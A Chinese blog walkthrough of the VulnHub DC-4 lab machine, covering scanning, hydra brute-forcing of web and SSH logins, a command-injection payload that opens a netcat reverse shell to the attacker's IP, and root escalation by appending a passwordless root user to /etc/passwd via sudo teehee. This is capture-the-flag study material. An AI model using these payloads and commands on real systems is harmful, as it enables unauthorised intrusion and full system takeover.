当前位置:网站首页>【Try to Hack】vulnhub DC4
【Try to Hack】vulnhub DC4
2022-07-01 16:28:00 【开心星人】
博客主页:开心星人的博客主页
系列专栏:Try to Hack
欢迎关注点赞收藏️留言
首发时间:2022年7月1日
作者水平很有限,如果发现错误,还望告知,感谢!
靶机默认为桥接模式
kali设置为桥接模式
主机发现netdiscover
靶机ip为192.168.0.151
namp -p- -A 192.168.0.151
ssh服务和http服务
访问80端口
dirb常规目录扫描dirb http://192.168.0.151
两个目录403
whatweb http://192.168.0.151
这个页面没法用cwel爬取字典
上弱口令
上hydra,用john自带的字典 /usr/share/john/password.lst
已知用户名为adminhydra -l admin -P /usr/share/john/password.lst 192.168.0.151 http-get /
可以执行命令,但是命令写死了
抓包看一下
确实是的
反弹个shellradio=nc+192.168.0.106+233+-e+/bin/sh&submit=Run
nc -lvvp 233
放包
python -c 'import pty;pty.spawn("/bin/bash")'
获得一个交互式的shell
ls /home
有三个用户
一个一个翻一下
只有jim能看
有密码
继续翻jim下的其他文件
没有权限查看mbox
现在看ssh服务
然后将三个用户保存为user.txt。
我直接把密码备份文件手动复制到了kali攻击机里
用hydra爆破ssh服务hydra -L user.txt -P password.txt 192.168.0.151 ssh -t 60
ssh爆破出来一个用户
jim:jibril04
登录看一下ssh [email protected]
登录成功
可以查看mbox
这是发邮件,root给jim发的邮件,但是没有邮件内容
在/var/jim里面找到 。(这个/var/mail是默认自带的文件夹,可能就是用来保存邮件的)
得到了charles的密码
登录看看
什么都没发现
现在只能考虑提权了
给了我们charles这个用户,那就用这个用户来提权
test.sh具有suid权限,但是我不知道它什么时候会运行,没见过它运行的样子。
第一考虑用用ping提权,但是发现好像不太行
用sudosudo -l
echo "happy::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
构造一个用户具有root权限,写入/etc/passwd
边栏推荐
- Borui data integrated intelligent observable platform was selected into the "Yunyuan production catalogue" of China Academy of communications in 2022
- sql刷题584. 寻找用户推荐人
- 模板引擎Velocity 基礎
- How does go use symmetric encryption?
- Zabbix2.2 monitoring system and application log monitoring alarm
- 判断一棵二叉树是否为平衡二叉树
- China sorbitol Market Forecast and investment strategy report (2022 Edition)
- How to restore the system of Sony laptop
- 挖财学堂班主任给的证券账户安全吗?能开户吗?
- How to restore the system with one click on Lenovo laptop
猜你喜欢
[flask introduction series] cookies and session
想做软件测试的女孩子看这里
ShenYu 网关开发:在本地启用运行
VMware 虚拟机启动时出现故障:VMware Workstation 与 Hyper-v 不兼容...
Germany if was crowned with many awards. How strong is this pair of headphones? In depth evaluation of yinpo GTW 270 hybrid
PR basic clip operation / video export operation
Rhcsa Road
美国国家安全局(NSA)“酸狐狸”漏洞攻击武器平台技术分析报告
Défaillance lors du démarrage de la machine virtuelle VMware: le poste de travail VMware n'est pas compatible avec hyper - V...
博睿数据一体化智能可观测平台入选中国信通院2022年“云原生产品名录”
随机推荐
阿里云、追一科技抢滩对话式AI
Detailed explanation of activity life cycle and startup mode
Analysis of PostgreSQL storage structure
AI高考志愿填报:大厂神仙打架,考生付费围观
剑指 Offer II 015. 字符串中的所有变位词
Why is the pkg/errors tripartite library more recommended for go language error handling?
模板引擎Velocity 基础
Is the programmer's career really short?
巴比特 | 元宇宙每日必读:奈雪币、元宇宙乐园、虚拟股票游戏...奈雪的茶这波“操作拉满”的营销活动你看懂了吗?...
今天14:00 | 港大、北航、耶鲁、清华、加大等15位ICLR一作讲者精彩继续!
What is the digital transformation of manufacturing industry
Origin2018 installation and use (sorting)
单例模式的懒汉模式跟恶汉模式的区别
博睿数据一体化智能可观测平台入选中国信通院2022年“云原生产品名录”
C language input / output stream and file operation
美国国家安全局(NSA)“酸狐狸”漏洞攻击武器平台技术分析报告
Advantages, values and risks of chain games compared with traditional games
毕业季 | 华为专家亲授面试秘诀:如何拿到大厂高薪offer?
C语言输入/输出流和文件操作
红队第8篇:盲猜包体对上传漏洞的艰难利用过程